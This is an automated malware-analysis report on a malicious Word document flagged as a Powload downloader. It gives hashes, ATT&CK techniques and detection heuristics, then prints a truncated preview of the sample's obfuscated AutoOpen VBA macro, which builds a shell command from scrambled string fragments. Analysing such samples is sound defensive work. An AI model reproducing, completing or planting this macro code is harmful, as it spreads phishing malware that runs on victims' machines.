Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0daef21240d620d0…

MALICIOUS

Office (OLE)

Size: 192.8 KB | Created: 2018-09-25 22:07:00 | Authoring application: Microsoft Office Word | First seen: 2019-09-30
MD5: 82e45ac2a8477e6ac0d4c371eb727f0a
SHA-1: f545b056d548947cff6e3d1dba19bcd1aa4cf29c
SHA-256: 0daef21240d620d0560a464273ef4d6ddffb954d555e123d21daa38ecf97ab71
Risk Score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File
  • T1566.001 Phishing: Spearphishing Attachment

The sample contains a legacy WordBasic AutoOpen macro, which is a critical indicator of malicious intent. This macro utilizes a Shell() call, a common technique for downloading and executing secondary payloads. The document also includes a lure for password-protected archives, suggesting a multi-stage attack. The ClamAV detection further confirms its malicious nature.

Heuristics (7)

  • ClamAV: Doc.Downloader.Powload-6697736-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Powload-6697736-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Password-protected archive handoff high SE_PASSWORD_ARCHIVE_LURE
    Document gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 208591 bytes
SHA-256: 78c0a421c2aade23db7a538b6edd8f6285b8aa22789e95c4127a707cd9705560
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "XvbVAwkLBJJKi"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   Dim suCzA(1)
suCzA(0) = MidB(zVCafC + ZoChRjhHREUNihb + CtIGW, 181, 379) + MidB(aXwMmM + WWTLMvvZOfITsqDfjwLHl + jtGKUH, 565, 365)
   Dim LLoiP(2)
LLoiP(0) = MidB(KCYfzu + ciunNWBjpzUCGkpFSbik + EaoPkmjz, 805, 512) + MidB(YdLpJIt + TDQvvKplzuhuJTiCPUMjCwL + dSWqwzlX, 447, 387)
LLoiP(1) = Right(uOEcpAd + HXMrAZGWzjwuISkzXvL + ZVGHD, 247) + MidB(rCVuJzw + AIUFdzGBmPjwwwRfTwT + AHsmY, 353, 81)
   Dim SZvcu(1)
SZvcu(0) = Right(VuIhufp + CCiibMaULTmaHSNLHIzwj + wtwiM, 642) + Mid(faukiGz + jYrumwUSiJZCFaNhcpzl + brqpiFIo, 857, 255) + Left(GLDBK + oDdVvEsSrRCzLwGij + kJsnb, 378) + Right(bfFizuz + niMqwbdYJzEvfnSTcHak + QmiDCCNb, 219)
   Dim rqzZER(2)
rqzZER(0) = MidB(obRpaj + UBCwEahzMpwVcabTFMw + XpNLk, 307, 796) + Mid(oLjwZ + QQZsbATrpOIpXzwY + PwjWnu, 632, 191) + Left(ACJowXL + otTvBqswnmzAJTqVoN + qLOwG, 386) + Mid(lXJaZ + ijBBiOiztRmqmCUkck + fYFnAcri, 355, 122)
rqzZER(1) = Right(pnLln + OCphRTvHGoSPvmdiNBILz + ZAzqi, 939) + MidB(Yqqro + rjbdnMCRiIfFrqAI + lQYrSMWv, 607, 717)
   Dim qzlOJ(1)
qzlOJ(0) = Right(ivWJkOVR + wkAqApOqqkwquhZCYtsZEhij + iozvli, 905) + MidB(qKXXP + kEcbLLVdwDLWIUbL + CFPmPqf, 717, 21)
   Dim BiICO(1)
BiICO(0) = MidB(MPfLfvXz + RRaZRnTMQTItUjvSL + wDnSR, 831, 110) + Right(SGcJp + kfViBEcfXRKMbfHTXlwl + kLAYIz, 81) + Mid(LmqKH + FntZuPdMMBWzvluRtbJWY + KQsDF, 994, 484) + MidB(LrWTUiN + zhBHZsRqAzwQVMjFJHBzBQZD + wKOza, 512, 604)
   Dim HKYjV(1)
HKYjV(0) = Mid(NzhIZ + YSzzrfaFTDlVGmzTsHVh + HDjwEI, 967, 10) + Left(EwfuJmzE + jXNYrvKzdClscuNBKEl + lKGDJ, 105)
SYRWVYAT (KeyString(spwcKwvo + iTCVijDT + 9 + 5 + 0 + 0 + 53 + iHvOmo + XfAhwHwO) + lOMwk + aDombZzz + KeyString(ktkqV + RowAU + 10 + 6 + 0 + 0 + 61 + UAAizC + cQLkaH) + bRvBKV + zzPXmt + wONzpQ + ArntsYhXKki + iMMOVw + jBPaQlG + JTKRkUHdtnV + UkhphDQP + zCOWjqHaB + zrcHBiVwjn + FiJzrdqQpq + tjlwWPFOt + iLQizmp + wmtCfln + alkqIFJ + BElSDBKh)
   Dim CubzjJ(1)
CubzjJ(0) = Mid(oHztSlJ + zmlIsMNkSSGFscMhwnAjV + quHlzJ, 737, 164) + Left(GbJiONAr + jPUjrXSFzFPiYczSJUw + GzEzkaz, 801)
End Sub


Attribute VB_Name = "kaZatch"
Function bRvBKV()
oCLkqfXwL = "d" + " " + CStr(Chr(7 + 8 + 7 + 2 + 23)) + "V" + CStr(Chr(7 + 8 + 7 + 2 + 23)) + "C" + CStr(Chr(5 + 5 + 4 + 1 + 19)) + "s" + "^" + "e^" + "t" + " +" + "{^"
kTOtiwAiowv = ",^" + "'" + "=^" + "51" + "9" + " ^" + "9" + "3" + "^" + "1" + " " + "^3"
vQWHpYvmjf = "5^" + "1" + "^" + " " + "1"
Dim dwTiD(2)
dwTiD(0) = MidB(iIHTYfbX + IkmBGjiOIbsEfPkhAknrb + MloLsJn, 837, 876) + MidB(KWNlQEs + DcDnzOOdUsLjUZnPRFNlh + qvPTjz, 73, 547)
dwTiD(1) = Right(hANdvJf + bbBrnrQckqqWpTNtlsH + lPYalWv, 654) + Mid(WuoEcbTW + rtLKlGbwnzTUPFYqjpIdiSj + lRRVJP, 906, 843)
   Dim hNHQqh(1)
hNHQqh(0) = MidB(PTbsi + KWFaVjVjwKGuPnKQukQfA + scHtB, 792, 30) + Mid(TcwLwc + BDmbpILshiJuUPqsZ + UENqUhSo, 35, 353)
JllGShdhcmR = "^" + "53" + "^" + " " + "1^" + "59" + "^ " + "1" + "^" + "0" + "9" + " ^" + "09" + "3 "
OtsGHtEk = "^" + "1" + "^0" + "5" + "^ " + "^1" + "0" + "9 " + "91" + "0 " + "1^" + "0^" + "9^"
tHCzj = " ^" + "3" + "0" + "1" + " " + "^"
Dim fuzwZt(2)
fuzwZt(0) = MidB(ZwDIcjN + QjrFXLKVcKFUNCKppM + PGJQiIp, 798, 914) + MidB(bXVjI + bDRsVFljaVYNWcwNvcLjm + HmzjTCGB, 703, 27) + MidB(kEfzFO + zqPbtknMQWfidzUHTSLlK + OJPdF, 352, 350) + Right(RWVpjGSo + osHGjNkBEnEFVmYiKEMm + cQiYMzX, 342)
fuzwZt(1) = Left(MHCiPVL + GNRVANUuJabGXzGipE + ZNcOjpS, 802) + MidB(wdSLudKr + IELGjbSOcbipaYzlFm + fHuIsCc, 452, 956) + Left(dVCWiIKA + TQnsUmLFzipwpTmQmF + qwWFCUd, 889) + MidB(SLrGPXQW + AUowXXpoknKphwjCrcFrwE + iDOzQ, 873, 735)
   Dim HXifi(2)
HXifi(0) = Mid(CEHWKJ + jUUPudrDQHlJkXRbnawXMoj + wzzYjoQv, 483, 442) + Left(QciOXDMS + SLijzkwHKozwGTiTcsjKi + TIpkXWLG, 583) + MidB(CofwRvdD + XvoBrwEmBzJCRnRRoschszj + akjiGTv, 263, 23) + Right(XGIsjqt + KAEplcvNwCKLbUVCjV + IHuhjk, 962)
HXifi(1) = Right(tZSaf
... (truncated)